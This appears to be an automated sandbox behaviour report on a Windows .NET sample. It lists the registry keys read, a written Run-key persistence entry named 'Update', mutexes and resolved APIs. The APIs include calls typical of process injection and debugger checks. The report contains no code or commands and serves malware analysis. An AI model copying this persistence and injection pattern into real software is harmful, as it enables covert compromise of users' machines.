HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\PCHealth\ErrorReporting\ForceQueueMode
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\PCHealth\ErrorReporting\ShowUI
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\PCHealth\ErrorReporting\DoReport
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\PCHealth\ErrorReporting\AllOrNone
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Server\(Default)
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Update
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\MachineID
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Consent\DefaultConsent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DontSendAdditionalData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Disabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Consent\DefaultConsent
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Consent\DefaultOverrideBehavior
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Consent\CLR20r3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\LoggingDisabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DontShowUI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DisableArchive
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\ConfigureArchive
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\DisableQueue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\MaxQueueCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\MaxArchiveCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\ForceQueue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\QueuePesterInterval
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\SendEFSFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\BypassDataThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\ForceUserModeCabCollection
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DontSendAdditionalData
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Disabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Consent\DefaultOverrideBehavior
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Consent\CLR20r3
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\LoggingDisabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DontShowUI
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DisableArchive
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\ConfigureArchive
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\DisableQueue
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\MaxQueueCount
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\MaxArchiveCount
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\ForceQueue
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\QueuePesterInterval
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\SendEFSFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\BypassDataThrottling
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\ForceUserModeCabCollection
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\CorporateWerServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\CorporateWerUseSSL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\CorporateWerPortNumber
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\CorporateWerUseAuthentication
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Reliability Analysis\RAC\RacWerSampleTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\RestartRunTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\RestartRunTime
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SESSION MANAGER\SafeProcessSearchMode
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\DataStore_V1.0\DataFilePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane3
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane4
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane6
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane10
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane11
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane12
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane13
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane14
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane15
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack\SurrogateFallback\Plane16
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\ScrollInset
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragDelay
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\DragMinDist
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\ScrollDelay
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\ScrollInterval
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\TIP\{0000897b-83df-4b96-be07-0fb58b01c4a4}\LanguageProfile\0x00000000\{0001bea3-ed56-483d-a2e2-aeae25577436}\Enable
HKEY_CURRENT_USER\Keyboard Layout\Toggle\Language Hotkey
HKEY_CURRENT_USER\Keyboard Layout\Toggle\Hotkey
HKEY_CURRENT_USER\Keyboard Layout\Toggle\Layout Hotkey
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\CTF\EnableAnchorContext
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\TurnOffSPIAnimations
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes\Segoe UI
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\EditionID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\BuildLabEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDBuildNumber
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\BIOSVersion
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Windows\CSDBuildNumber
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\LastWatsonCabUploaded
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\WinHttpSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\44D72C57
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession

Write Keys

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Update

Delete Keys

Nothing to display

Mutexes

Global\CLR_CASOFF_MUTEX
Global\2fb590c0-4edc-11e8-b448-080027839166
Local\MSCTF.Asm.MutexDefault1

Resolved APIs

advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
kernel32.dll.FlsAlloc
kernel32.dll.FlsFree
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.InitializeCriticalSectionEx
kernel32.dll.CreateEventExW
kernel32.dll.CreateSemaphoreExW
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.CreateThreadpoolTimer
kernel32.dll.SetThreadpoolTimer
kernel32.dll.WaitForThreadpoolTimerCallbacks
kernel32.dll.CloseThreadpoolTimer
kernel32.dll.CreateThreadpoolWait
kernel32.dll.SetThreadpoolWait
kernel32.dll.CloseThreadpoolWait
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.FreeLibraryWhenCallbackReturns
kernel32.dll.GetCurrentProcessorNumber
kernel32.dll.GetLogicalProcessorInformation
kernel32.dll.CreateSymbolicLinkW
kernel32.dll.EnumSystemLocalesEx
kernel32.dll.CompareStringEx
kernel32.dll.GetDateFormatEx
kernel32.dll.GetLocaleInfoEx
kernel32.dll.GetTimeFormatEx
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.IsValidLocaleName
kernel32.dll.LCMapStringEx
kernel32.dll.GetTickCount64
advapi32.dll.EventRegister
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll._CorExeMain
shlwapi.dll.UrlIsW
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
kernel32.dll.InitializeCriticalSectionAndSpinCount
kernel32.dll.IsProcessorFeaturePresent
msvcrt.dll._set_error_mode
msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z
kernel32.dll.FindActCtxSectionStringW
kernel32.dll.GetSystemWindowsDirectoryW
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
mscorwks.dll._CorExeMain
mscorwks.dll.GetCLRFunction
advapi32.dll.RegisterTraceGuidsW
advapi32.dll.UnregisterTraceGuids
advapi32.dll.GetTraceLoggerHandle
advapi32.dll.GetTraceEnableLevel
advapi32.dll.GetTraceEnableFlags
advapi32.dll.TraceEvent
mscoree.dll.IEE
mscoreei.dll.IEE
mscorwks.dll.IEE
mscoree.dll.GetStartupFlags
mscoreei.dll.GetStartupFlags
mscoree.dll.GetHostConfigurationFile
mscoreei.dll.GetHostConfigurationFile
mscoreei.dll.GetCORVersion
mscoree.dll.GetCORSystemDirectory
mscoreei.dll.GetCORSystemDirectory_RetAddr
mscoreei.dll.CreateConfigStream
ntdll.dll.RtlUnwind
kernel32.dll.IsWow64Process
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.AddVectoredContinueHandler
kernel32.dll.RemoveVectoredContinueHandler
advapi32.dll.ConvertSidToStringSidW
shell32.dll.SHGetFolderPathW
kernel32.dll.GetWriteWatch
kernel32.dll.ResetWriteWatch
kernel32.dll.CreateMemoryResourceNotification
kernel32.dll.QueryMemoryResourceNotification
kernel32.dll.QueryActCtxW
kernel32.dll.GetVersionExW
kernel32.dll.GetFullPathNameW
ole32.dll.CoInitializeEx
cryptbase.dll.SystemFunction036
ole32.dll.CoGetContextToken
advapi32.dll.CryptAcquireContextA
advapi32.dll.CryptReleaseContext
advapi32.dll.CryptCreateHash
advapi32.dll.CryptDestroyHash
advapi32.dll.CryptHashData
advapi32.dll.CryptGetHashParam
advapi32.dll.CryptImportKey
advapi32.dll.CryptExportKey
advapi32.dll.CryptGenKey
advapi32.dll.CryptGetKeyParam
advapi32.dll.CryptDestroyKey
advapi32.dll.CryptVerifySignatureA
advapi32.dll.CryptSignHashA
advapi32.dll.CryptGetProvParam
advapi32.dll.CryptGetUserKey
advapi32.dll.CryptEnumProvidersA
mscoree.dll.GetMetaDataInternalInterface
mscoreei.dll.GetMetaDataInternalInterface
mscorwks.dll.GetMetaDataInternalInterface
mscorjit.dll.getJit
kernel32.dll.VirtualProtect
kernel32.dll.GlobalMemoryStatusEx
kernel32.dll.GetEnvironmentVariableW
kernel32.dll.SwitchToThread
kernel32.dll.GetUserDefaultUILanguage
kernel32.dll.SetErrorMode
kernel32.dll.GetFileAttributesExW
mscoreei.dll.LoadLibraryShim
culture.dll.ConvertLangIdToCultureName
kernel32.dll.lstrlen
kernel32.dll.lstrlenW
mscoree.dll.ND_RI4
mscoreei.dll.ND_RI4
bcrypt.dll.BCryptGetFipsAlgorithmMode
kernel32.dll.CloseHandle
kernel32.dll.GetCurrentProcessId
advapi32.dll.LookupPrivilegeValueW
kernel32.dll.GetCurrentProcess
advapi32.dll.AdjustTokenPrivileges
kernel32.dll.OpenProcess
psapi.dll.EnumProcessModules
psapi.dll.GetModuleInformation
psapi.dll.GetModuleBaseNameW
psapi.dll.GetModuleFileNameExW
kernel32.dll.GetProcAddress
kernel32.dll.DebugActiveProcess
kernel32.dll.WaitForDebugEvent
kernel32.dll.ContinueDebugEvent
kernel32.dll.DeleteFileA
advapi32.dll.SetKernelObjectSecurity
advapi32.dll.GetKernelObjectSecurity
ntdll.dll.NtSetInformationProcess
ntdll.dll.NtProtectVirtualMemory
kernel32.dll.GetModuleFileNameW
shfolder.dll.SHGetFolderPathW
kernel32.dll.CreateDirectoryW
kernel32.dll.MoveFileW
kernel32.dll.LocalFree
kernel32.dll.CreatePipe
kernel32.dll.DuplicateHandle
kernel32.dll.GetStdHandle
kernel32.dll.GetCurrentDirectoryW
kernel32.dll.CreateProcessW
kernel32.dll.GetFileType
kernel32.dll.GetConsoleCP
kernel32.dll.GetACP
kernel32.dll.UnmapViewOfFile
kernel32.dll.GetConsoleOutputCP
kernel32.dll.WriteFile
ole32.dll.CoUninitialize
kernel32.dll.CreateActCtxW
kernel32.dll.AddRefActCtx
kernel32.dll.ReleaseActCtx
kernel32.dll.ActivateActCtx
kernel32.dll.DeactivateActCtx
kernel32.dll.GetCurrentActCtx
advapi32.dll.EventUnregister
kernel32.dll.SetThreadUILanguage
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
kernel32.dll.CopyFileExW
kernel32.dll.IsDebuggerPresent
kernel32.dll.SetConsoleInputExeNameW
ntdll.dll.NtQueryInformationProcess
kernel32.dll.GetTempPathW
kernel32.dll.CreateFileW
kernel32.dll.GetFileSize
kernel32.dll.ReadFile
kernel32.dll.VirtualAllocEx
kernel32.dll.GetThreadContext
kernel32.dll.Wow64GetThreadContext
ntdll.dll.NtUnmapViewOfSection
kernel32.dll.ResumeThread
kernel32.dll.SetThreadContext
kernel32.dll.Wow64SetThreadContext
kernel32.dll.WriteProcessMemory
kernel32.dll.ReadProcessMemory
kernel32.dll.TerminateProcess
advapi32.dll.CheckTokenMembership
mscoree.dll.DllGetClassObject
mscoreei.dll.DllGetClassObject
diasymreader.dll.DllGetClassObjectInternal
wer.dll.WerReportCreate
wer.dll.WerReportSetParameter
wer.dll.WerReportAddFile
wer.dll.WerReportSetUIOption
wer.dll.WerReportSubmit
wer.dll.WerReportAddDump
wer.dll.WerReportCloseHandle
user32.dll.LoadStringW
advapi32.dll.RegGetValueW
user32.dll.GetProcessWindowStation
user32.dll.GetThreadDesktop
user32.dll.GetUserObjectInformationW
sensapi.dll.IsNetworkAlive
rpcrt4.dll.RpcBindingFromStringBindingW
rpcrt4.dll.RpcBindingSetAuthInfoExW
rpcrt4.dll.NdrClientCall2
user32.dll.CharUpperW
werui.dll.WerUICreate
werui.dll.WerUIStart
ole32.dll.CoInitialize
uxtheme.dll.ThemeInitApiHook
user32.dll.IsProcessDPIAware
dui70.dll.InitProcessPriv
comctl32.dll.LoadIconWithScaleDown
ntdll.dll.RtlRunEncodeUnicodeString
ntdll.dll.RtlInitUnicodeString
ntdll.dll.RtlRunDecodeUnicodeString
dui70.dll.InitThread
duser.dll.InitGadgets
user32.dll.RegisterMessagePumpHook
dui70.dll.?GetClassInfoPtr@CCBase@DirectUI@@SGPAUIClassInfo@2@XZ
dui70.dll.?GetFactoryLock@Element@DirectUI@@SGPAU_RTL_CRITICAL_SECTION@@XZ
dui70.dll.??0CritSecLock@DirectUI@@QAE@PAU_RTL_CRITICAL_SECTION@@@Z
dui70.dll.?ClassExist@ClassInfoBase@DirectUI@@SG_NPAPAUIClassInfo@2@PBQBUPropertyInfo@2@IPAU32@PAUHINSTANCE__@@PBG_N@Z
dui70.dll.??0ClassInfoBase@DirectUI@@QAE@XZ
dui70.dll.?Initialize@ClassInfoBase@DirectUI@@QAEJPAUHINSTANCE__@@PBG_NPBQBUPropertyInfo@2@I@Z
dui70.dll.?Register@ClassInfoBase@DirectUI@@QAEJXZ
dui70.dll.?IsGlobal@ClassInfoBase@DirectUI@@UBE_NXZ
dui70.dll.?GetName@ClassInfoBase@DirectUI@@UBEPBGXZ
dui70.dll.?GetModule@ClassInfoBase@DirectUI@@UBEPAUHINSTANCE__@@XZ
dui70.dll.??1CritSecLock@DirectUI@@QAE@XZ
dui70.dll.??0CCBase@DirectUI@@QAE@KPBG@Z
dui70.dll.?Initialize@CCBase@DirectUI@@QAEJIPAVElement@2@PAK@Z
duser.dll.CreateGadget
duser.dll.SetGadgetMessageFilter
duser.dll.SetGadgetStyle
dui70.dll.?OnPropertyChanging@Element@DirectUI@@UAE_NPBUPropertyInfo@2@HPAVValue@2@1@Z
dui70.dll.?HandleUiaPropertyChangingListener@Element@DirectUI@@UAEXPBUPropertyInfo@2@@Z
dui70.dll.?HandleUiaPropertyListener@Element@DirectUI@@UAEXPBUPropertyInfo@2@HPAVValue@2@1@Z
dui70.dll.?DirectionProp@Element@DirectUI@@SGPBUPropertyInfo@2@XZ
dui70.dll.?OnPropertyChanged@CCBase@DirectUI@@UAEXPBUPropertyInfo@2@HPAVValue@2@1@Z
dui70.dll.?SetFontSize@Element@DirectUI@@QAEJH@Z
dui70.dll.?SetWidth@Element@DirectUI@@QAEJH@Z
dui70.dll.?SetHeight@Element@DirectUI@@QAEJH@Z
dui70.dll.?EndDefer@Element@DirectUI@@QAEXK@Z
dui70.dll.?OnGroupChanged@Element@DirectUI@@UAEXH_N@Z
duser.dll.InvalidateGadget
dui70.dll.CreateDUIWrapper
dui70.dll.?SetNotifyHandler@CCBase@DirectUI@@QAEXP6GHIIJPAJPAX@Z1@Z
shell32.dll.ExtractIconExW
comctl32.dll.TaskDialogIndirect
dwmapi.dll.DwmIsCompositionEnabled
uxtheme.dll.IsThemeActive
duser.dll.SetGadgetRootInfo
uxtheme.dll.IsAppThemed
uxtheme.dll.GetThemeAppProperties
ole32.dll.CreateStreamOnHGlobal
xmllite.dll.CreateXmlReader
xmllite.dll.CreateXmlReaderInputWithEncodingName
uxtheme.dll.OpenThemeData
uxtheme.dll.GetThemeMargins
uxtheme.dll.GetThemeFont
uxtheme.dll.GetThemeColor
uxtheme.dll.GetThemeMetric
oleaut32.dll.#6
duser.dll.SetGadgetParent
duser.dll.GetDUserModule
duser.dll.FindStdColor
duser.dll.AttachWndProcW
kernel32.dll.InterlockedPopEntrySList
kernel32.dll.InterlockedPushEntrySList
kernel32.dll.InterlockedCompareExchange
comctl32.dll.RegisterClassNameW
duser.dll.GetGadgetRect
duser.dll.GetGadgetRgn
duser.dll.GetGadgetTicket
gdi32.dll.GetLayout
gdi32.dll.GdiRealizationInfo
gdi32.dll.FontIsLinked
gdi32.dll.GetTextFaceAliasW
gdi32.dll.GetFontAssocStatus
advapi32.dll.RegQueryValueExA
gdi32.dll.GdiIsMetaPrintDC
dui70.dll.?GetPICount@ClassInfoBase@DirectUI@@UBEIXZ
dui70.dll.?GetByClassIndex@ClassInfoBase@DirectUI@@UAEPBUPropertyInfo@2@I@Z
dui70.dll.?OnHosted@HWNDHost@DirectUI@@MAEXPAVElement@2@@Z
dui70.dll.?CreateAccNameLabel@HWNDHost@DirectUI@@IAEPAUHWND__@@PAU3@@Z
uxtheme.dll.EnableThemeDialogTexture
dui70.dll.?OnMessage@HWNDHost@DirectUI@@UAE_NIIJPAJ@Z
dui70.dll.?CreateHWND@CCBase@DirectUI@@UAEPAUHWND__@@PAU3@@Z
comctl32.dll.HIMAGELIST_QueryInterface
comctl32.dll.DrawShadowText
comctl32.dll.DrawSizeBox
comctl32.dll.DrawScrollBar
comctl32.dll.SizeBoxHwnd
comctl32.dll.ScrollBar_MouseMove
comctl32.dll.ScrollBar_Menu
comctl32.dll.HandleScrollCmd
comctl32.dll.DetachScrollBars
comctl32.dll.AttachScrollBars
comctl32.dll.CCSetScrollInfo
comctl32.dll.CCGetScrollInfo
comctl32.dll.CCEnableScrollBar
comctl32.dll.QuerySystemGestureStatus
uxtheme.dll.#49
uxtheme.dll.CloseThemeData
dui70.dll.?PostCreate@CCBase@DirectUI@@MAEXPAUHWND__@@@Z
dui70.dll.?IsContentProtected@Element@DirectUI@@UAE_NXZ
uxtheme.dll.GetThemeBool
duser.dll.GetGadgetFocus
uxtheme.dll.GetThemeBackgroundContentRect
uxtheme.dll.GetThemeTextMetrics
uxtheme.dll.GetThemePartSize
uxtheme.dll.GetThemeTextExtent
uxtheme.dll.GetThemeBackgroundExtent
ole32.dll.CoRegisterInitializeSpy
ole32.dll.CoRevokeInitializeSpy
duser.dll.SetGadgetFocus
duser.dll.DUserSendEvent
duser.dll.SetGadgetRect
ole32.dll.CoCreateInstance
comctl32.dll.SetWindowSubclass
comctl32.dll.DefSubclassProc
dui70.dll.?GetHWND@HWNDHost@DirectUI@@UAEPAUHWND__@@XZ
uxtheme.dll.#47
duser.dll.FindGadgetFromPoint
uxtheme.dll.BufferedPaintInit
uxtheme.dll.BeginBufferedPaint
